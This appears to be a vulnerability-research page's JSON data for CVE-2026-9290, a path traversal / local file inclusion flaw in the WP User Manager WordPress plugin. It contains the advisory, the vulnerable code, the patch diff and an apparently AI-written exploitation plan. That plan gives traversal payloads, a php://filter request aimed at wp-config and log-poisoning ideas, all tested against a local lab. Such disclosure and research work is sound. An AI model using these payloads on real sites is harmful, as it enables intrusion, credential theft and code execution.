[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fPfBV-hJKYs4ophZDEWblyxZQy6OeDmkH22jGAhIpXgs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-9290","wp-user-manager-unauthenticated-path-traversal-to-local-file-inclusion-via-tab-query-parameter","WP User Manager \u003C= 2.9.17 - Unauthenticated Path Traversal to Local File Inclusion via 'tab' Query Parameter","The WP User Manager – User Profile Builder & Membership plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.17 via the (profile template scope) function. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.","wp-user-manager",null,"\u003C=2.9.17","2.9.18","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-06-05 00:00:00","2026-06-05 23:28:26",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7a5e08d8-c6ef-42a3-9599-28c3bfb35017?source=api-prod",1,[22,23,24,25,26,27,28,29],"includes\u002Factions.php","includes\u002Fadmin\u002Fclass-wpum-avatars.php","includes\u002Femails\u002Fclass-wpum-emails-customizer-scripts.php","includes\u002Ffunctions.php","languages\u002Fwp-user-manager.pot","readme.txt","vendor-dist\u002Fcomposer\u002Finstalled.php","wp-user-manager.php","researched",false,3,"This exploitation research plan targets **CVE-2026-9290**, a Local File Inclusion (LFI) vulnerability in **WP User Manager** up to version **2.9.17**.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') leading to Local File Inclusion (LFI).\n*   **Root Cause:** The plugin uses the `tab` query parameter to dynamically determine which template file to include for the user profile or account page. It fails to sanitize this parameter for path traversal sequences (`..\u002F`), allowing an attacker to escape the intended directory and include arbitrary `.php` files from the server.\n*   **Impact:** Unauthenticated RCE (if a PHP file can be uploaded, e.g., via avatars) or disclosure of sensitive information within PHP files.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** User Profile Page (Frontend).\n*   **Query Parameter:** `tab`.\n*   **Authentication:** Unauthenticated.\n*   **Preconditions:** \n    1.  The \"Profile Page\" must be configured in WPUM settings (standard setup).\n    2.  At least one user must exist to provide a valid profile path.\n    3.  The `tab` parameter must reach the template loading logic (typically within the profile template scope).\n\n### 3. Code Flow\n1.  **Entry:** A `GET` request is made to a public user profile URL (e.g., `\u002Fprofile\u002Fadmin\u002F?tab=payload`).\n2.  **Processing:** WordPress parses the request. WP User Manager registers the `tab` query variable via `get_query_var( 'tab' )`.\n3.  **Template Selection:** On the profile page, the plugin calls a rendering function (often involving the `gamajo\u002Ftemplate-loader` library, as seen in `vendor-dist\u002Fcomposer\u002Finstalled.php`).\n4.  **Vulnerable Sink:** The logic resembles:\n    ```php\n    $tab = get_query_var( 'tab' );\n    \u002F\u002F ...\n    $loader->get_template_part( 'profiles\u002Ftabs\u002Fcontent', $tab ); \n    ```\n5.  **Inclusion:** The template loader constructs a path: `wp-content\u002Fplugins\u002Fwp-user-manager\u002Ftemplates\u002Fprofiles\u002Ftabs\u002Fcontent-{$tab}.php` and passes it to `include()`.\n6.  **Exploitation:** By setting `tab=..\u002F..\u002F..\u002F..\u002F[path_to_file_without_extension]`, the attacker forces the inclusion of `[path_to_file_without_extension].php`.\n\n### 4. Nonce Acquisition Strategy\n*   **Nonce Requirement:** **None**. \n*   **Reasoning:** Profile pages are public-facing views intended for SEO and community interaction. The `tab` query variable is used during the standard `GET` request lifecycle to render different sections of the profile (e.g., \"About\", \"Posts\"). These do not typically implement CSRF protection\u002Fnonces for viewing.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Discover the Profile Base URL\nNavigate to the homepage and look for any link to a user profile or check the default `\u002Fprofile\u002F` slug.\n*   **Tool:** `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002F\")`\n\n#### Step 2: Create a Trigger File (PoC Verification)\nSince we need to include a `.php` file, we will create a file in the WordPress root to simulate a \"poisoned\" file.\n*   **Command:** `wp eval \"file_put_contents(ABSPATH . 'pwn.php', '\u003C?php echo \\\"CVE-2026-9290_EXPLOITED\\\"; ?>');\"`\n\n#### Step 3: Execute LFI Request\nConstruct the traversal payload. Since the plugin likely appends `.php`, the payload should point to the filename without the extension.\n*   **Target URL:** `http:\u002F\u002Flocalhost:8080\u002Fprofile\u002Fadmin\u002F?tab=..\u002F..\u002F..\u002F..\u002F..\u002Fpwn`\n*   **HTTP Tool:** `http_request`\n*   **Request Details:**\n    *   **Method:** `GET`\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fprofile\u002Fadmin\u002F?tab=..\u002F..\u002F..\u002F..\u002F..\u002Fpwn` (Adjust the number of `..\u002F` based on directory depth).\n\n### 6. Test Data Setup\n1.  **Ensure a User Exists:**\n    `wp user create attacker attacker@example.com --role=subscriber`\n2.  **Ensure Profile Page is Set:**\n    Verify the `profile_page` option exists: `wp option get wpum_settings`.\n    If not set, create a page with the shortcode:\n    `wp post create --post_type=page --post_title=\"Profile\" --post_status=publish --post_content='[wpum_profile]'`\n    Then update the plugin setting to use this page ID.\n\n### 7. Expected Results\n*   The HTTP response should contain the string `CVE-2026-9290_EXPLOITED`.\n*   The response status should be `200 OK`.\n*   The content should be rendered within the main content area of the profile page template.\n\n### 8. Verification Steps\n1.  **Response Check:** Use the `http_request` output to verify the presence of the unique PoC string.\n2.  **Access Logs:** Check for the `GET` request with the traversal payload.\n3.  **Cleanup:** `wp eval \"unlink(ABSPATH . 'pwn.php');\"`\n\n### 9. Alternative Approaches\n*   **Wrapper Inclusion:** If `.php` is NOT appended (unlikely for template parts), attempt to include `\u002Fetc\u002Fpasswd` via the `php:\u002F\u002Ffilter` wrapper: `tab=php:\u002F\u002Ffilter\u002Fconvert.base64-encode\u002Fresource=..\u002F..\u002F..\u002F..\u002Fwp-config`.\n*   **Log Poisoning:** If the site has a predictable log path (e.g., `wp-content\u002Fdebug.log`), poison the log with PHP code via a failed login attempt and include the log file.\n*   **Theme Template LFI:** Attempt to include files from the active theme or other plugins: `tab=..\u002F..\u002F..\u002F..\u002Fthemes\u002Ftwentytwentyone\u002Ffunctions`.","WP User Manager versions up to 2.9.17 are vulnerable to unauthenticated Local File Inclusion via the 'tab' query parameter used on user profile and account pages. Attackers can use path traversal sequences to include and execute arbitrary PHP files from the server's file system, potentially leading to remote code execution.","\u002F\u002F includes\u002Ffunctions.php line 953\nfunction wpum_get_active_profile_tab() {\n\t$first_tab   = key( wpum_get_registered_profile_tabs() );\n\t$profile_tab = get_query_var( 'tab', $first_tab );\n\n\treturn $profile_tab;\n}\n\n---\n\n\u002F\u002F includes\u002Factions.php line 265\nfunction wpum_display_account_page_content() {\n\n\t$active_tab = get_query_var( 'tab' );\n\t$tabs       = wpum_get_account_page_tabs();\n\n\tif ( empty( $active_tab ) ) {\n\t\t$active_tab = key( $tabs );\n\t}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-manager\u002F2.9.17\u002Fincludes\u002Factions.php\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-manager\u002F2.9.18\u002Fincludes\u002Factions.php\n@@ -262,10 +262,11 @@\n  *\u002F\n function wpum_display_account_page_content() {\n \n-\t$active_tab = get_query_var( 'tab' );\n \t$tabs       = wpum_get_account_page_tabs();\n+\t$active_tab = get_query_var( 'tab' );\n \n-\tif ( empty( $active_tab ) ) {\n+\t\u002F\u002F Validate against registered tabs to prevent path traversal \u002F LFI.\n+\tif ( empty( $active_tab ) || ! isset( $tabs[ $active_tab ] ) ) {\n \t\t$active_tab = key( $tabs );\n \t}\n \n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-manager\u002F2.9.17\u002Fincludes\u002Ffunctions.php\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-manager\u002F2.9.18\u002Fincludes\u002Ffunctions.php\n@@ -951,9 +951,15 @@\n  * @return string\n  *\u002F\n function wpum_get_active_profile_tab() {\n-\t$first_tab   = key( wpum_get_registered_profile_tabs() );\n+\t$registered  = wpum_get_registered_profile_tabs();\n+\t$first_tab   = key( $registered );\n \t$profile_tab = get_query_var( 'tab', $first_tab );\n \n+\t\u002F\u002F Validate against registered tabs to prevent path traversal \u002F LFI.\n+\tif ( ! isset( $registered[ $profile_tab ] ) ) {\n+\t\t$profile_tab = $first_tab;\n+\t}\n+\n \treturn $profile_tab;\n }","An unauthenticated attacker can exploit this vulnerability by navigating to a public user profile page and appending a malicious 'tab' parameter. By using path traversal sequences (e.g., ?tab=..\u002F..\u002F..\u002F..\u002Ftarget_file), the attacker can force the plugin to include an arbitrary .php file from the server. If the attacker can upload a PHP file to the server (for instance, via a profile avatar upload feature), they can achieve Remote Code Execution (RCE) by including that uploaded file.","gemini-3-flash-preview","2026-06-26 04:18:06","2026-06-26 04:19:09",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.9.17","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-manager\u002Ftags\u002F2.9.17","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-user-manager.2.9.17.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-manager\u002Ftags\u002F2.9.18","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-user-manager.2.9.18.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-manager\u002Ftags"]